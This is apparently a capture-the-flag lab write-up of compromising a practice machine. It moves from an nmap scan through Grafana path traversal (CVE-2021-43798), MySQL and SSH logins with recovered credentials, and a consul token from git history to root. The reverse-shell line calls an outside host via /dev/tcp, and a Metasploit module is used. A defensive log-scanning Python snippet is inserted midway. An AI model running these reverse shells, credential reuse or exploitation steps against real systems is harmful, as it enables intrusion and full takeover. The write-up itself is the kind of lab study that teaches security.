Doing the initial nmap scan, we see 4 ports open
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRkl
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 03 Oct 2022 04:37:31 GMT
| Content-Length: 29
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 12
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, SupportsCompression, SwitchToSSLAfterHandshake, FoundRows, ODBCClient, ConnectWithDatabase, Speaks41ProtocolNew, LongColumnFlag, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x1D?!9'Z3\x01cc5\x1E:`9mj\x0D99
|_ Auth Plugin Name: caching_sha2_password
Looking at port 3000, we see it's running Grafana. At the bottom we can see its version at
Looking for exploits for this version, we see a Local File Inclusion vulnerability exists for versions from
Grafana 8.3.1, 8.2.7, 8.1.8, and 8.0.7 released with high severity security fix
Note: We released fixes for CVE-2021-41090 and CVE-2021-43798 within 24 hours and mixed them up in one of the three…
I also found a python script to exploit this
exploit-grafana-CVE-2021-43798/exploit.py at main · pedrohavay/exploit-grafana-CVE-2021-43798
But unfortunately this didn't work for me, so I had to look into the source code and figure out how to exploit this manually.
It seems like it's requesting a vulnerable endpoint and sending a typical LFI payload. Following the exploit, I was able to get the contents of the /etc/passwd file with this payload.
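As an added example (not part of the original post), here is a small log check a defender could run to spot the traversal requests described above. It assumes combined-format access-log lines (constructed here) and that the vulnerable route is Grafana's /public/plugins/ asset path; it percent-decodes each request path until stable, flags any '..' segment, and reports the file the request would resolve to.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). Two are
# benign; two carry a traversal payload against Grafana's public plugin
# asset route, the endpoint affected by CVE-2021-43798.
SAMPLE_LOG = """\
10.10.14.5 - - [03/Oct/2022:04:40:01 +0000] "GET /login HTTP/1.1" 200 3121
10.10.14.5 - - [03/Oct/2022:04:40:02 +0000] "GET /public/plugins/grafana-clock-panel/img/clock.svg HTTP/1.1" 200 912
10.10.14.5 - - [03/Oct/2022:04:40:03 +0000] "GET /public/plugins/grafana-clock-panel/../../../../../../etc/passwd HTTP/1.1" 200 1847
10.10.14.5 - - [03/Oct/2022:04:40:04 +0000] "GET /public/plugins/alertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fgrafana%2fgrafana.ini HTTP/1.1" 200 7602
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_path(raw: str) -> str:
    """Drop the query string and percent-decode until stable, so a
    double-encoded '..' cannot slip past the check."""
    prev, cur = None, raw.split("?", 1)[0]
    while prev != cur:
        prev, cur = cur, unquote(cur)
    return cur

def traversal_target(raw_path: str):
    """Return the normalized file a request would reach if the server does not
    collapse '..' segments, or None when the path has no such segment."""
    decoded = decode_path(raw_path)
    if ".." not in decoded.split("/"):
        return None
    return posixpath.normpath(decoded)

def scan_log(text: str) -> list:
    """Parse combined-format lines and report traversal attempts; a 200 on such
    a request means the server most likely served the file."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        target = traversal_target(m["path"])
        if target is None:
            continue
        findings.append({
            "src": m["src"], "ts": m["ts"], "path": m["path"],
            "resolved": target, "served": m["status"] == "200",
        })
    return findings
```

Running scan_log(SAMPLE_LOG) yields the two traversal requests with the files they resolved to (/etc/passwd and the Grafana configuration file), both served with a 200.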
Here, I found out that there is a user called
Since there is Grafana running, with this LFI, I looked into its configuration file at
From there, I found that there was a sqlite3 database to look for. It was at
So I downloaded it and opened it with
From there I found the password to login to the mysql server as
mysql -u grafana -h 10.10.11.183 -p'dontStandSoCloseToMe63221!'
Looking through the databases, I saw there was a database called whackywidget. Querying this database, I was able to get a base64 encoded password for the
By decoding this, I was able to log in with ssh as
Looking through the file system, I saw there was a git repo in /opt/my-app. Looking for previous commits in the repo with git show, I was able to get a token for
Looking at the open ports, I saw port 8500 was open, which is the default port for consul. Consul was running as root.
From this point onwards, there are 2 ways to go.
Method I — Manual exploitation with health check scripts
So I started enumerating the service more. Then I was able to figure out that the config directory for consul was writable by the
I did a little googling and found out that I can add health check scripts for consul which will be triggered upon restart. So I made a health check script which would execute a bash script that includes a reverse shell.
I moved this file to the config directory of
cp /tmp/check.json /etc/consul.d/config.d/
And for the reverse shell (/tmp/shell.sh), I used the typical bash reverse shell.
bash -c 'bash -i >& /dev/tcp/10.10.11.12/9090 0>&1'
Once everything was in place, I restarted the
consul reload --token bb03b43b-1d81-d62b-24b5-39540ee469b5
Then I got a shell on my listener.
Method II — Exploiting with Metasploit by registering a service
While I was doing the box, I came across an exploit module from metasploit which could exploit the consul service by registering a new service.
Hashicorp Consul Remote Command Execution via Services API
For that you have to use the exploit/multi/misc/consul_service_exec module. You have to set the options as follows and simply run the module.
Once you run it, you should be able to get a full meterpreter session which can then be used to get a shell as root.
Contact me through social media:
Email — email@example.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄